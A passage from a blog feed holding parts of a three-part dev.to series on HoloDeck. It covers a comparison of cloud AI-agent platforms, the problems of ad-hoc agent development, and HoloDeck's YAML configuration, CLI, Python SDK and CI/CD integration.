&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge, custom metrics, RAG eval&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM)&lt;/td&gt;
&lt;td&gt;Bedrock models only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you want to use local models or run outside AWS, this isn't really an option.&lt;/p&gt;




&lt;h3&gt;
  
  
  Vertex AI Agent Engine (Google Cloud)
&lt;/h3&gt;

&lt;p&gt;Google's entry into the agent space. The A2A protocol for multi-agent communication is interesting. Like the others, you're tied to GCP.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;What I want&lt;/th&gt;
&lt;th&gt;Vertex AI Agent Engine&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Deployment Model&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Self-hosted (open-source)&lt;/td&gt;
&lt;td&gt;SaaS (GCP-managed)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;CI/CD Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;CLI, works anywhere&lt;/td&gt;
&lt;td&gt;Cloud Build/GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Definition&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Pure YAML&lt;/td&gt;
&lt;td&gt;Code (ADK, LangChain, LangGraph)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Primary Focus&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Experimentation &amp;amp; deployment&lt;/td&gt;
&lt;td&gt;Production agent runtime&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Orchestration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Multi-agent patterns&lt;/td&gt;
&lt;td&gt;Multi-agent via A2A protocol&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No (GCP required)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Agent Evaluation&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Custom criteria, LLM-as-judge, NLP&lt;/td&gt;
&lt;td&gt;LLM-as-judge (Gemini), ROUGE/BLEU&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Self-Hosted LLMs&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Native support (Ollama, vLLM)&lt;/td&gt;
&lt;td&gt;vLLM in Model Garden (complex setup)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Similar story—great if you're committed to GCP, but not portable.&lt;/p&gt;




&lt;h2&gt;
  
  
  What's Missing
&lt;/h2&gt;

&lt;p&gt;After looking at all of these, here's what I couldn't find:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Self-hosted and cloud-agnostic&lt;/strong&gt; - Everything is either SaaS or tied to a specific cloud&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Declarative agent definition&lt;/strong&gt; - Most require SDK code, not just config&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Vendor-neutral CI/CD&lt;/strong&gt; - The integrations assume you're using their ecosystem&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Testing + evaluation + deployment in one place&lt;/strong&gt; - Usually you're stitching together multiple tools&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the gap I'm trying to fill with HoloDeck. Not saying it's better than these tools—they're solving different problems. But if you care about portability and owning your workflow, there wasn't much out there.&lt;/p&gt;




&lt;h2&gt;
  
  
  Quick Reference
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;If you need...&lt;/th&gt;
&lt;th&gt;Look at...&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Production observability for LangChain&lt;/td&gt;
&lt;td&gt;LangSmith&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ML experiment tracking at scale&lt;/td&gt;
&lt;td&gt;MLflow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Visual prompt flow design on Azure&lt;/td&gt;
&lt;td&gt;PromptFlow&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Enterprise agents in Microsoft ecosystem&lt;/td&gt;
&lt;td&gt;Azure AI Foundry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Managed agents on AWS&lt;/td&gt;
&lt;td&gt;Bedrock AgentCore&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Production runtime on GCP&lt;/td&gt;
&lt;td&gt;Vertex AI Agent Engine&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Self-hosted, config-driven, CI/CD-native&lt;/td&gt;
&lt;td&gt;HoloDeck&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  Next Up
&lt;/h2&gt;

&lt;p&gt;In &lt;a href="https://justinbarias.github.io//blog/holodeck-part3-solution" rel="noopener noreferrer"&gt;Part 3&lt;/a&gt;, I'll walk through how HoloDeck works—the design decisions, the YAML config approach, the SDK, and what's actually built vs. what's still on the roadmap.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;Continue to Part 3 →&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>genai</category>
      <category>agents</category>
    </item>
    <item>
      <title>HoloDeck Part 1: Why Building AI Agents Feels So Broken</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82</guid>
      <description>&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌──────────────────────────────────────────────────────────────────────┐
│ Today's Agent Development Workflow (The Problem) │
└──────────────────────────────────────────────────────────────────────┘

    ┌─────────────────┐
    │ BUILD │ (LangChain/CrewAI/AutoGen)
    │ Fragmented │
    │ Frameworks │
    └────────┬────────┘
             │
             │ Manual Testing
             ▼
    ┌─────────────────────────────────────────┐
    │ EVALUATE │
    │ (Evaluation SDKs / Unit Tests / E2E) │
    │ (Manual Testing / Jupyter Notebooks) │
    └────────┬────────────────────────────────┘
             │
             │ Guess &amp;amp; Check
             ▼
    ┌─────────────────┐
    │ DEPLOY │ (Docker / Custom Orchestration)
    │ Custom Scripts │
    └────────┬────────┘
             │
             │ Hope it Works
             ▼
    ┌─────────────────┐
    │ MONITOR │ (Datadog / Custom Logs)
    │ Reactive Fixes │
    └────────┬────────┘
             │
             │ Something Broke?
             │
             └─────────────────────────┐
                                       │
                              (Loop Back to BUILD)
                                       │
                                       ▼

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The AI agent hype is everywhere. But unlike the deep learning era that gave us reproducible experiments and systematic tooling, we're building agents with &lt;em&gt;ad-hoc&lt;/em&gt; tools, fragmented frameworks, and basically no methodology. I've been frustrated by this for a while, and I wanted to write down what I think is broken.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 1 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Why Building AI Agents Feels So Broken&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;What's Out There&lt;/a&gt; - Looking at LangSmith, MLflow, and the major cloud providers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck"&gt;What I'm Building&lt;/a&gt; - HoloDeck's approach and how it works&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Mess We're In
&lt;/h2&gt;

&lt;p&gt;There's no shortage of frameworks—LangChain, LlamaIndex, CrewAI, AutoGen, and dozens more. Each promises to simplify agent development. But they all leave you solving the &lt;em&gt;same hard problems&lt;/em&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;How do I know which prompt actually works?&lt;/strong&gt; You tweak it manually. Test it manually. Repeat endlessly.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I make my agent safe?&lt;/strong&gt; You add guardrails ad-hoc. Validation rules scattered across your codebase. No systematic testing.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I optimize performance?&lt;/strong&gt; You adjust temperature, top_p, max tokens. Trial and error until something seems to work.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I deploy this reliably?&lt;/strong&gt; You build custom orchestration. Write deployment scripts. Manage versioning yourself.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How do I know my agent still works after I changed that one thing?&lt;/strong&gt; You hope. You test manually. You ship bugs to production.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Here's what bugs me: we're shipping &lt;em&gt;agents&lt;/em&gt;, not code. Yet we treat them like traditional software—write it once, deploy it, call it done. But agents are probabilistic systems. Their behavior varies. Their performance degrades. Their configurations matter as much as their code.&lt;/p&gt;

&lt;p&gt;Something's off.&lt;/p&gt;




&lt;h2&gt;
  
  
  Why This Bugs Me Now
&lt;/h2&gt;

&lt;p&gt;Agents aren't just demos anymore. They're going into production:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Customer support&lt;/strong&gt; - Agents handling real customer queries, with real consequences for bad responses&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code generation&lt;/strong&gt; - Agents writing and deploying code, with security implications&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Data analysis&lt;/strong&gt; - Agents making decisions that inform business strategy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Workflow automation&lt;/strong&gt; - Agents executing multi-step processes with real-world effects&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;When your agent hallucinates in a Jupyter notebook, you shrug and re-run the cell. When your agent hallucinates in production, you lose customers, leak data, or worse.&lt;/p&gt;

&lt;p&gt;The gap between "cool demo" and "production-ready" is huge. And I've watched teams discover this the hard way—including my own.&lt;/p&gt;




&lt;h2&gt;
  
  
  We've Done This Before
&lt;/h2&gt;

&lt;p&gt;Here's what I keep coming back to: the deep learning revolution wasn't about finding the perfect neural network. It was about &lt;strong&gt;systematizing the process&lt;/strong&gt; of building them.&lt;/p&gt;

&lt;p&gt;Think about the traditional ML pipeline:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Define architecture&lt;/strong&gt; - Choose layers, activation functions, size. The &lt;em&gt;structure&lt;/em&gt; matters.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Define loss function&lt;/strong&gt; - Quantify what "good" means. Measure it.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Hyperparameter search&lt;/strong&gt; - Systematically explore temperature, learning rate, batch size. Test rigorously.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evaluate and iterate&lt;/strong&gt; - Run experiments. Compare results. Make data-driven decisions.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This wasn't guesswork. It was &lt;em&gt;scientific method applied to AI&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;The community built frameworks around this—Keras, PyTorch, TensorFlow. They made the pipeline accessible. Suddenly, thousands of practitioners could build sophisticated models because the &lt;em&gt;methodology&lt;/em&gt; was codified.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;But somehow, we've abandoned this for agents.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;We're back to hand-tuning prompts. Testing agents by running them once. Deploying based on gut feel. Ignoring the systematic approach that made deep learning successful.&lt;/p&gt;

&lt;p&gt;Why did we regress?&lt;/p&gt;




&lt;h2&gt;
  
  
  So What's Out There?
&lt;/h2&gt;

&lt;p&gt;Before I started building my own thing, I wanted to understand the landscape. In &lt;a href="https://justinbarias.github.io//blog/holodeck-part2-comparison" rel="noopener noreferrer"&gt;Part 2&lt;/a&gt;, I look at what's available:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LangSmith&lt;/strong&gt; (LangChain's observability platform)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;MLflow GenAI&lt;/strong&gt; (Databricks)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft PromptFlow&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Azure AI Foundry&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Amazon Bedrock AgentCore&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google Vertex AI Agent Engine&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;They all solve &lt;em&gt;parts&lt;/em&gt; of the problem. But I couldn't find anything that addressed everything I cared about. And they all &lt;em&gt;lock&lt;/em&gt; you into a platform or ecosystem.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Continue to Part 2 →&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>agents</category>
      <category>evals</category>
    </item>
    <item>
      <title>HoloDeck Part 3: How I'm Approaching Agent Development</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 15 Nov 2024 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck</link>
      <guid>https://dev.to/jeremiahbarias/holodeck-part-3-how-im-approaching-agent-development-4gck</guid>
<description>&lt;p&gt;In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Part 1&lt;/a&gt;, I talked about what feels broken in agent development. In &lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;Part 2&lt;/a&gt;, I looked at what's out there. Now let me walk through what I'm building.&lt;/p&gt;




&lt;h2&gt;
  
  
  This is Part 3 of a 3-Part Series
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-1-why-building-ai-agents-feels-so-broken-5h82"&gt;Why It Feels Broken&lt;/a&gt; - What's wrong with agent development&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/jeremiahbarias/holodeck-part-2-whats-out-there-for-ai-agents-4880"&gt;What's Out There&lt;/a&gt; - The current landscape&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;How HoloDeck Works&lt;/strong&gt; (You are here)&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  The Core Idea
&lt;/h2&gt;

&lt;p&gt;The insight that got me started: &lt;strong&gt;agents are systems with measurable components that can be optimized systematically.&lt;/strong&gt; We did this for ML. Why not agents?&lt;/p&gt;

&lt;h3&gt;
  
  
  The Analogy
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Traditional ML&lt;/th&gt;
&lt;th&gt;Agent Engineering&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;NN Architecture&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Artifacts (prompts, instructions, tools, memory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Loss Function&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Evaluators (NLP metrics, LLM-as-judge, custom scoring)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Hyperparameters&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Configuration (temperature, top_p, max_tokens, model)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Training Loop&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Execution Framework&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Evaluation Metrics&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Benchmarks &amp;amp; Test Suites&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Model Checkpoints&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent Versions &amp;amp; Snapshots&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;ML engineers don't manually tweak neural network weights. So why are we manually tweaking agent behavior? We should be able to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Version our artifacts&lt;/strong&gt; - Track which prompts, tools, and instructions we're using&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measure systematically&lt;/strong&gt; - Define evaluators that quantify agent performance&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optimize through configuration&lt;/strong&gt; - Run experiments across temperature, top_p, context length, tool selection&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test rigorously&lt;/strong&gt; - Benchmark against baselines, compare variants, ship only what passes&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;That's the approach I'm taking.&lt;/p&gt;
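
&lt;p&gt;The "optimize through configuration" step maps directly onto a hyperparameter-style grid search. Here's a minimal sketch in plain Python; the &lt;code&gt;evaluate&lt;/code&gt; function is a stand-in for a real evaluator run, not part of any SDK:&lt;/p&gt;

```python
from itertools import product

# Stand-in for a real evaluator run: in practice this would execute
# the agent with the given settings against a test suite and return
# an aggregate score. Here it just pretends (0.3, 0.9) scores best.
def evaluate(temperature: float, top_p: float) -> float:
    return 1.0 - abs(temperature - 0.3) - abs(top_p - 0.9)

# Systematic sweep instead of hand-tuning: score every combination
# and keep the best, exactly like a hyperparameter grid search.
grid = {
    "temperature": [0.0, 0.3, 0.7, 1.0],
    "top_p": [0.8, 0.9, 1.0],
}
results = [
    {"temperature": t, "top_p": p, "score": evaluate(t, p)}
    for t, p in product(grid["temperature"], grid["top_p"])
]
best = max(results, key=lambda r: r["score"])
```

&lt;p&gt;Swap the stub for a real test-suite run and the same loop gives you a data-driven pick instead of gut feel.&lt;/p&gt;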




&lt;h2&gt;
  
  
  How &lt;a href="https://useholodeck.ai/" rel="noopener noreferrer"&gt;HoloDeck&lt;/a&gt; Works
&lt;/h2&gt;

&lt;p&gt;Three design principles:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Configuration-First&lt;/strong&gt; - Pure YAML defines agents, not code&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measurement-Driven&lt;/strong&gt; - Evaluation baked in from the start&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CI/CD Native&lt;/strong&gt; - Agents deploy like code&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Architecture
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────┐
│                    HOLODECK PLATFORM                    │
└─────────────────────────────────────────────────────────┘
                           │
        ┌──────────────────┼──────────────────┐
        ▼                  ▼                  ▼
┌──────────────┐  ┌──────────────┐  ┌──────────────┐
│   Agent      │  │  Evaluation  │  │  Deployment  │
│   Engine     │  │  Framework   │  │  Engine      │
└──────────────┘  └──────────────┘  └──────────────┘
        │                  │                  │
        ├─ LLM Providers   ├─ AI Metrics     ├─ FastAPI
        ├─ Tool System     ├─ NLP Metrics    ├─ Docker
        ├─ Memory          ├─ Custom Evals   ├─ Cloud Deploy
        └─ Vector Stores   └─ Reporting      └─ Monitoring
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Config-First Design
&lt;/h2&gt;

&lt;p&gt;You define your entire agent in YAML. Here's a simple example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;name: "My First Agent"
description: "A helpful AI assistant"
model:
  provider: "openai"
  name: "gpt-4o-mini"
  temperature: 0.7
  max_tokens: 1000
instructions:
  inline: |
    You are a helpful AI assistant.
    Answer questions accurately and concisely.

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No Python. No custom code. You define &lt;em&gt;what&lt;/em&gt; your agent does; HoloDeck handles &lt;em&gt;how&lt;/em&gt; it runs.&lt;/p&gt;

&lt;p&gt;Then interact via the CLI:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Initialize a new project
holodeck init my-chatbot

# Edit your agent configuration
# (customize agent.yaml as needed)

# Chat with your agent interactively
holodeck chat agent.yaml

# Run automated tests
holodeck test agent.yaml

# Deploy as a local API
holodeck deploy agent.yaml --port 8000

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Pretty minimal. The &lt;a href="https://docs.useholodeck.ai/" rel="noopener noreferrer"&gt;docs&lt;/a&gt; cover more complex setups—tools, memory, evaluators.&lt;/p&gt;
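
&lt;p&gt;As a taste of where that goes, here's a sketch of a richer config. The &lt;code&gt;tools&lt;/code&gt; and &lt;code&gt;evaluations&lt;/code&gt; sections below are illustrative field names, not the documented schema; the docs have the real one:&lt;/p&gt;

```yaml
name: "Support Agent"
description: "Answers questions against a knowledge base"
model:
  provider: "openai"
  name: "gpt-4o-mini"
  temperature: 0.3
instructions:
  inline: |
    Answer using only the retrieved context.
# Illustrative sections below; field names are guesses
tools:
  - type: "vectorstore"
    name: "kb_search"
evaluations:
  - metric: "f1"
    threshold: 0.8
```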




&lt;h2&gt;
  
  
  When You Need Code
&lt;/h2&gt;

&lt;p&gt;YAML isn't everything. For programmatic test execution, dynamic configuration, or complex workflows, there's an SDK:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from holodeck.config.loader import ConfigLoader
from holodeck.lib.test_runner.executor import TestExecutor
import os

# Load configuration with environment variable support
os.environ["OPENAI_API_KEY"] = "sk-..."
loader = ConfigLoader()
config = loader.load("agent.yaml")

# Run tests programmatically
executor = TestExecutor()
results = executor.run_tests(config)

# Access detailed results with metrics
for test_result in results.test_results:
    print(f"Test: {test_result.test_name}")
    print(f"Status: {test_result.status}")
    print(f"Metrics: {test_result.metrics}")

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Start with YAML, drop into code when you need to. The SDK gives you:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/config-loader/" rel="noopener noreferrer"&gt;ConfigLoader&lt;/a&gt; - dynamic configuration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/test-runner/" rel="noopener noreferrer"&gt;TestExecutor&lt;/a&gt; - test orchestration&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/models/" rel="noopener noreferrer"&gt;Agent Models&lt;/a&gt; - Pydantic validation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://docs.useholodeck.ai/api/evaluators/" rel="noopener noreferrer"&gt;Evaluators&lt;/a&gt; - NLP metrics and LLM-as-judge scoring&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  DevOps Integration
&lt;/h2&gt;

&lt;p&gt;Agents should work like software:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Version Control&lt;/strong&gt; - Agent configs are versioned. Track changes, rollback if needed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Testing Pipeline&lt;/strong&gt; - Run agents through test suites. Compare across versions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;holodeck test agents/customer_support.yaml
holodeck deploy agents/ --env staging --monitor

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Monitoring&lt;/strong&gt; - &lt;a href="https://opentelemetry.io/" rel="noopener noreferrer"&gt;OpenTelemetry&lt;/a&gt; integration following &lt;a href="https://opentelemetry.io/docs/specs/semconv/gen-ai/" rel="noopener noreferrer"&gt;GenAI Semantic Conventions&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Standard trace, metric, and log collection&lt;/li&gt;
&lt;li&gt;GenAI attributes: &lt;code&gt;gen_ai.system&lt;/code&gt;, &lt;code&gt;gen_ai.request.model&lt;/code&gt;, &lt;code&gt;gen_ai.usage.*&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;Cost tracking&lt;/li&gt;
&lt;li&gt;Works with Jaeger, Prometheus, Datadog, Honeycomb, LangSmith&lt;/li&gt;
&lt;/ul&gt;
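
&lt;p&gt;Cost tracking falls out of those usage attributes: multiply the recorded token counts by per-token prices. A minimal sketch (the attribute dict stands in for a real span's attributes, and the prices are made-up placeholders, not actual rates):&lt;/p&gt;

```python
# Attributes as recorded per the GenAI semantic conventions.
# This dict stands in for a real OpenTelemetry span's attributes.
span_attributes = {
    "gen_ai.system": "openai",
    "gen_ai.request.model": "gpt-4o-mini",
    "gen_ai.usage.input_tokens": 1200,
    "gen_ai.usage.output_tokens": 350,
}

# Placeholder prices in USD per 1M tokens (not real rates).
PRICES = {"gpt-4o-mini": {"input": 0.15, "output": 0.60}}

def estimate_cost(attrs: dict) -> float:
    # Look up the model's price table and weight each token type.
    price = PRICES[attrs["gen_ai.request.model"]]
    cost = (
        attrs["gen_ai.usage.input_tokens"] / 1_000_000 * price["input"]
        + attrs["gen_ai.usage.output_tokens"] / 1_000_000 * price["output"]
    )
    return round(cost, 6)
```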

&lt;p&gt;&lt;strong&gt;CI/CD&lt;/strong&gt; - Works with GitHub Actions, GitLab CI, Jenkins, whatever you use.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# .github/workflows/deploy-agents.yml
on: [push]
jobs:
  test-agents:
    runs-on: ubuntu-latest
    steps:
      - run: holodeck test agents/
      - run: holodeck deploy agents/ --env production

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  What I'm Going For
&lt;/h2&gt;

&lt;p&gt;I got tired of:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Needing to know 10 different frameworks to do anything&lt;/li&gt;
&lt;li&gt;Writing custom orchestration for every project&lt;/li&gt;
&lt;li&gt;Manual testing and "hope it works" deployments&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;What I wanted:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Accessible&lt;/strong&gt; - YAML-based, code optional&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Measurable&lt;/strong&gt; - Evaluation from day one&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Reliable&lt;/strong&gt; - Systematic testing and versioning&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portable&lt;/strong&gt; - Not locked to any cloud&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Current State
&lt;/h2&gt;

&lt;p&gt;HoloDeck is in active development. What's working now:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;CLI&lt;/strong&gt; - Commands for init, chat, test, validate, and deploy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Interactive Chat&lt;/strong&gt; - CLI chat with streaming and multimodal support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tools&lt;/strong&gt; - Vector store integration, MCP (Model Context Protocol) support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Test Cases&lt;/strong&gt; - YAML-based test scenarios, multimodal file support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Evaluations&lt;/strong&gt; - NLP metrics (F1, ROUGE, BLEU, METEOR) and LLM-as-judge scoring&lt;/li&gt;
&lt;li&gt;
